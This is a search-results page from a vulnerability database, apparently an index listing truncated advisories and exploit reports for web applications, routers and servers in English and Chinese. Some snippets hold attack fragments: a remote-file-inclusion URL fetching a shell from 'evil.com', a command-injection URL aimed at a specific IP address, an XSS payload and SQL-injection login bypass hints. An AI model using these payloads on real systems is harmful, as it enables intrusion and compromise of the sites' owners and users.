56796 matches found
MetaCart E-Shop ProductsByCategory.ASP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13639/info MetaCart e-Shop is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrar...
泛微E-office OA管理系统通过sql注入可以任意真实用户名免密码登陆
简要描述: 泛微E-office OA管理系统通过sql注入可以任意真实用户名免密码登陆 详细说明: 以泛微官方测试站点为例 登陆页面为 http://eoffice8.weaver.cn:8028/login.php 则可注入的网址为 http://eoffice8.weaver.cn:8028/building/urlurl.php 直接访问显示access denied, 使用hackbar。post内容中,url为general/index.php,smsid为注入sql,内容为1 union select...
FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
No description provided by source. NeXtMaN mc.nadz at gmail.com Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
MikroTik RouterOS SMB Buffer Overflow(CVE-2018-7445)
Advisory Information Title: MikroTik RouterOS SMB Buffer Overflow Advisory ID: CORE-2018-0003 Advisory URL: http://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow Date published: 2018-03-15 Date of last update: 2018-03-15 Vendors contacted: MikroTik Release mode:...
By the MurmurHash2 algorithm, a collision caused by Redis DDos attack vulnerability
Summary information: 1. In Martin Bosslet 2012 this article, The author mentioned the MurmurHash2 algorithm was found to be the stable structure of the collision function, the hash function and its deformation is CRuby, JRuby, Rubinius, Redis, etc. open source components used. 2. This article is...
通达OA存在SQL注入风险
简要描述: 通达OA存在SQL注入风险 详细说明: 吐槽一句:上次提交了一个通达最新版本存在存储型XSS的问题,厂商居然以【用户以实名制登录】为理由而基本忽视了这个问题,我想问:用户账户就不会被盗?登录账户的一定是其本人? 这次涉及版本包括其官方网站能下到的所有版本的试用版。 1、通过OA的知道系统提交一个问题,在问题的的“标签”里加个单引号,没有过滤写到数据库: 2、访问这个问题,系统会从该问题的“标签”中去除内容,做LIKE查询,以找到相关联的内容,系统对POST、GET、COOKIES等方式的过滤非常完美,但是从自身数据库取出的数据并未过滤: 漏洞证明:...
PHPWind flash xss 0day?
简要描述: 突然发现的,在乌云上一搜,是insight-labs提交了的一个,官方回复已经修复,但是修复不完整。 详细说明: 在测试其他网站时,发现了这个flash文件,看了下代码, ExternalInterface.callthis.jQuery, "jPlayerFlashEvent", arg0.type, this.extractStatusDataarg0.data; 搜索jquery: this.jQuery = loaderInfo.parameters.jQuery + "'" + loaderInfo.parameters.id + "'.jPlayer";...
MinaliC Webserver 1.0 - Directory Traversal Vulnerability
No description provided by source. ------------------------------------------------------------------------ Software................MinaliC Webserver 1.0 Vulnerability...........Directory Traversal Download................http://sourceforge.net/projects/minalic/ Release Date............10/24/2010...
zcms 2.x 后台投稿处 存储型XSS和CSRF漏洞
No description provided by source...
ecshop最新2.7.3版本后台本地包含漏洞
简要描述: ecshop最新2.7.3版本后台本地包含漏洞 详细说明: admin/integrate.php文件,110行 $code = empty$GET'code' ? '' : trim$GET'code'; if empty$code || fileexistsROOTPATH . DATADIR . '/integrate' . $code . 'log.php' sysmsg$LANG'lostintalllog', 1; includeROOTPATH . DATADIR . '/integrate' . $code . 'log.php'; 1. $code 未过滤 ...
Firefox GeckoActiveXObject异常消息COM对象枚举漏洞
BUGTRAQ ID: 37360 CVECAN ID: CVE-2009-3987 Firefox是一款流行的开源WEB浏览器。 Mozilla的GeckoActiveXObject所生成的异常消息会根据系统注册表中是否存在所请求COM对象的ProgID而不同,恶意站点可以根据这个差异枚举出用户系统上所安装的COM对象列表,并创建配置文件跨浏览会话追踪用户。 Mozilla Firefox 3.5.x Mozilla Firefox 3.0.x Mozilla SeaMonkey 2.0 厂商补丁: Mozilla -------...
悟空CRM无需任何权限的SQL注入漏洞2(ThinkPHP特性)
简要描述: 一个没有权限控制的类,正好又有注入 (给L.N.添堵系列之三) 另外厂商分给高点呗,别这么小气本来不想挖了的。 详细说明: /App/Lib/Mobile/LogMobile.class.php 这个类没有权限验证(initialize方法)哦 看到edit函数: //修改沟通日志 public function edit if$this-isPost $id = isset$POST'id' ? intval$POST'id' : 0; $params = jsondecode$POST'params',true; if!isarray$params...
Webfroot Shoutbox 2.32 Expanded.PHP Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7772/info Shoutbox is prone to an issue that may result in the execution of attacker-supplied code. The vulnerability exists due to insufficient sanitization of input into the expanded.php script...
php后台验证码绕过暴力破解
简要描述: php后台验证码绕过暴力破解 详细说明: 最新版 登陆请求为: username=admin&password=admin88&authcode=adaa&loginsub=&pytoken=e474ef35609b 验证码使用一次没有销毁,可以一直使用导致后台暴力破解。 漏洞证明:...
Google Chrome释放后重用远程代码执行漏洞(CVE-2013-2884)
BUGTRAQ ID: 61551 CVECAN ID: CVE-2013-2884 Google Chrome是由Google开发的一款设计简单、高效的Web浏览工具。 Chrome 28.0.1500.95在DOM的实现上存在释放后重用漏洞,远程攻击者通过跟踪包含Attr对象的文档,利用此漏洞造成拒绝服务等其他攻击。 0 Google Chrome 28.0.1500.95 厂商补丁: Google ------ 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:...
ISC BIND 9 DNS64 远程拒绝服务漏洞
BUGTRAQ ID: 57556 CVECAN ID: CVE-2012-5689 BIND是一个应用非常广泛的DNS协议的实现。 ISC BIND 9.8.x、9.9.x在某些配置中,DNS64的响应策略区域缺少AAAA重写规则,远程攻击者通过AAAA记录查询,可造成拒绝服务(断言失败并退出指定程序)。 0 ISC BIND 9.9.x ISC BIND 9.8.x 临时解决方法: 2013年1月24日厂商已经发布beta版本,修复了此漏洞。如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁: 确保RPZ包含每个A重写规则的AAAA重写规则。 厂商补丁: IS...
Online Contact Manager 3.0 view.php id Parameter XSS
存在漏洞版本: =3.0 漏洞描述: Online Contact Manager 3.0 是一个web上的联系人管理系统应用。其存在由于用户的非正常输入导致的危险. 远程的用户可以注入 SQL 命令, 同时也能够执行跨站脚本攻击. 远程的用户也可以植入 html 来挂马 'view.php' 脚本没有正确的验证用户对于 ‘id’ 变量的输入。一个远程的用户可以创建一个特殊构造的 URL, 当目标用户加载此页面的时候, 将会造成目标用户的浏览器上的任意代码的执行.这个代码将会在 Online Contact Manager 中执行,会在整个网站的安全背景下运行。因此,...
TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? printr' -------------------------------------------------------------------------------- TikiWiki = 1.9 Sirius jhot.php remote commands execution exploit by rgod [email protected] site: http://retrogod.altervista.org dork:...
Netgear R6220 管理后台默认口令
No description provided by source...
创梦网络信息管理系统 v2.2.5 登录绕过漏洞
No description provided by source...
VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection Vulnerability
No description provided by source. VP-ASP 6.00 SQL Injection / Exploit by [email protected] people claimed there is some underground sploit for vp-asp 6.00 and I was sure that if a sploit really exist in the ug i can find the bug and make a small hack for it ^^ well it didn't take me mor...
Critical RCE Vulnerability Found in Over a Million GPON Home Routers
Overview: We conducted a comprehensive assessment on a number of GPON home routers. Many routers today use GPON internet, and we found a way to bypass all authentication on the devices CVE-2018-10561. With this authentication bypass, we were also able to unveil another command injection...
eTrust Antivirus Agent r8 Local Privilege Elevation Exploit
No description provided by source. / ---------------------------------------------------------------------- | 48Bits Advisory -=- Privilege Elevation in eTrust Antivirus Agent r8 | ---------------------------------------------------------------------- Affected versions : I have tested with: -...
亿邮网关未验证登陆即可进入查看用户邮件信息
简要描述: 漏洞导致亿邮网关可以不需要亿邮的登陆即可进入,只需要用户的邮箱地址即可登入,查看用户的邮箱操作与相关信息。 详细说明: /gw/user/php/user/userlogin.php?userid=XXX XXX为用户邮箱地址,只要知道邮箱地址即可进入用户网关,不知道也可以爆破 漏洞证明: 通过详细说明中的地址即可跳转过来了。...
phpLiteAdmin 'phpliteadmin.php'远程PHP代码注入漏洞
phpLiteAdmin是一款基于web的SQLite数据库管理工具 phpLiteAdmin 'phpliteadmin.php'创建新数据库时不正确过滤用户提交的数据,允许攻击者利用漏洞注入恶意文件,并以WEB权限执行 0 phpLiteAdmin =1.9.3 厂商解决方案 目前没有详细解决方案提供: http://code.google.com/p/phpliteadmin/...
User Home Pages UHP_CONFIG.PHP远程文件包含漏洞
User Home Pages是一款基于PHP的个人主页管理程序。 User Home Pages不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是'uhpconfig.php'脚本对用户提交的"mosConfigabsolutepath"参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 User Home Pages User Home Pages 0.5 http://mamboxchange.com/projects/uhp/...
Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
No description provided by source. !/bin/sh Exploit for Apache modrewrite off-by-one. Vulnerability discovered by Mark Dowd. CVE-2006-3747 by jack jack\x40gulcas\x2Eorg 2006-08-20 Thx to xuso for help me with the shellcode. I suppose that you've the RewriteRule kung/. $1 rule if not you must...
fluxbb存在PHP本地文件包含漏洞
简要描述: 很明显的本地包含 详细说明: 文件:install.php // If we've been passed a default language, use it $installlang = isset$REQUEST'installlang' ? puntrim$REQUEST'installlang' : 'English'; // If such a language pack doesn't exist, or isn't up-to-date enough to translate this page, default to English if...
easySite内容管理系统FCKeditor上传任意类型文件
简要描述: 早有人搞了 在网上没见公开的.. 详细说明: 漏洞证明:...
CUPS IPP标签远程栈溢出漏洞
BUGTRAQ ID: 26268 CVECAN ID: CVE-2007-4351 Common Unix Printing System CUPS是一款通用Unix打印系统,是Unix环境下的跨平台打印解决方案,基于Internet打印协议,提供大多数PostScript和raster打印机服务。 CUPS的cups/ipp.c文件中的ippReadIO函数在处理IPP(Internet打印协议)标签时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制服务器。...
MS15-076 Windows: DCOM DCE/RPC Local NTLM Reflection Elevation of Privilege (CVE-2015-2370)
Windows: DCOM DCE/RPC-Local NTLM Reflection Elevation of Privilege Platform: Windows 8.1 Update not tested on Windows 7, 10 Class: Elevation of Privilege Summary: Local DCOM DCE/RPC connections can be reflected back to a listening TCP socket allowing access to an NTLM authentication challenge for...
Kaspersky AntiVirus SysInfo ActiveX控件任意文件越过过滤漏洞
Kaspersky Antivirus是一款流行的反病毒程序。 Kaspersky Antivirus ActiveX控件使用不安全方法,远程攻击者可以利用漏洞下载或删除系统任意文件。 问题存在于AxKLProd60.dll和AxKLSysInfo.dll中的ActiveX控件,攻击者可以构建恶意WEB页,诱使用户访问触发,并可以以系统权限下载或删除系统任意文件。 Kaspersky Internet Security 6.0 Kaspersky Anti-Virus 6.0 可采用自动更新获得修正: http://www.kaspersky.com/technews?id=203038...
SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability
No description provided by source. ================================================================= SQuery = 4.5libpath Remote File Inclusion Exploit ================================================================= Worked On : ALL VERSIONS | | Critical Level : Dangerous | | Gug Found In :...
ColdFusion RCE(CVE-2018-4939)
In October 2017 I published an overview and video proof-of-concept of a Java RMI/deserialization vulnerability affecting the Flex Integration service of Adobe ColdFusion. I held off on publishing all of the details and exploit code at the time because I spotted an additional exploit payload that...
CMSEasy v5.5 /celive/live/header.php SQL注入漏洞
No description provided by source...
KLINK SQL Injection Vulnerability
No description provided by source. Andr?s G?mez Exploit Title : KLINK Sql Injection Vulnerability Date : 2010-12-31 Author : Andr?s G?mez Software Developed by : http://www.contacto.comhttp://www.contacto.com.com/ Contact : [email protected] Dork : allinurl:.php?txtCodiInfo= An attacker m...
nginx 1.3.9-1.4.0 - DoS PoC
No description provided by source. Exploit Title: nginx v1.3.9-1.4.0 DOS POC CVE-2013-2028 Google Dork: CVE-2013-2028 Date: 16.05.2013 Exploit Author: Mert SARICA - mert . sarica @ gmail . com - http://www.mertsarica.com Vendor Homepage: http://nginx.org/ Software Link:...
DVbbs < 8.3.0 dispbbs.asp跨站漏洞
DVBBS所有低于8.3.0的版本的page参数都具有一个通用跨站漏洞。 Dvbbs 7.1.X 与 8.2.X 之间的版本中,该跨站漏洞存在于dispbbs.asp中: http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="scriptaler t/liscker/;/script Dvbbs7.1.0 的版本中,该跨站漏洞存在于list.asp中: http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=scripta...
Tomcat snoop.jsp存在跨站脚本漏洞
No description provided by source...
Apache mod_proxy_ftp模块空指针引用拒绝服务漏洞
BUGTRAQ ID: 36260 CVE ID: CVE-2009-3094 Apache HTTP Server是一款流行的Web服务器。 Apache的modproxyftp模块中modules/proxy/proxyftp.c文件的approxyftphandler函数中存在空指针引用漏洞,正在被代理的恶意FTP服务器可以通过发送特制的EPSV或PASV命令回复导致httpd子进程崩溃,造成有限的拒绝服务。 Apache Group Apache 2.2.x 厂商补丁: Apache Group ------------...
Adobe Flash Player Use After Free Remote Code Execution Vulnerability(CVE-2018-4878)
EXECUTIVE SUMMARY The 1st of February, Adobe published an advisory concerning a Flash vulnerability CVE-2018-4878. This vulnerability is a use after free that allows Remote Code Execute through a malformed Flash object. Additionally KISA Korean CERT published an advisory about a Flash 0-day used ...
天融信Topsec系统 getMacAddr.php 命令执行
getMacAddr.php: code 区域 '; ? 跟进getMacAddrFromIfName code 区域 function getMacAddrFromIfName$ifName $mac = execute'cat /sys/class/net/' . trim$ifName . '/address'-get'output'; if$mac != null && $mac != '' return $mac0; else return ''; http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo...
ASPCMS 2.2.9 /inc/AspCms_Visits.asp SQL注入漏洞
ASPCMS是国内一款非常流行的CMS 建站系统,其2.2.9版本/inc/AspCmsVisits.asp文件中在该文件的行 6 将ContentID直接拼接到了注入语句,从而导致sql注入漏洞。 ASPCMS 2.2.9...
Squirrelmail 1.4.22 Remote Code Execution (CVE-2017-7692)
Squirrelmail version 1.4.22 and probably prior is vulnerable to a remote code execution vulnerability because it fails to sanitize a string before passing it to a popen call. It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server. The problem is in...
PHPEMS一处SQL注入漏洞
简要描述: PHPEMS一处SQL注入漏洞 详细说明: 8.PHPEMS某处SQL注入漏洞 存在注入漏洞的代码位置是/app/exam/phone.php的exercise函数中 具体存在漏洞地方位于239行附近 $numbers$p'questid' = intvalceil$this-exam-getQuestionNumberByQuestypeAndKnowsid$p'questid',$knowids; 这里getQuestionNumberByQuestypeAndKnowsid第二个参数$knowids是完全可控的 进入函数内部 public function...
Boa 0.93.15 Administrator Password Overwrite Authentication Bypass Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/25676/info Boa is prone to an authentication-bypass vulnerability because the application fails to ensure that passwords are not overwritten by specially crafted HTTP Requests. An attacker can exploit this issue to gain...
Mafia Moblog 6 Big.PHP Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '81940' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-16' createDate = '2015-12-24...
Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
Exploiting Adobe ColdFusion before CVE-2017-3066 In a recent penetration test my teammate Thomas came across several servers running Adobe ColdFusion 11 and 12. Some of them were vulnerable to CVE-2017-3066 but no outgoing TCP connections were possible to exploit the vulnerability. He asked me...
PHP 5.3.6 - Buffer Overflow PoC (ROP)
No description provided by source. ?php / Jonathan Salwan - @jonathansalwan http://shell-storm.org 2011-06-04 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 Stack-based buffer overflow in the socketconnect function in ext/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow...
TRS WCM 6.5 /wcm/services/trs:templateservicefacade 任意文件创建漏洞
No description provided by source...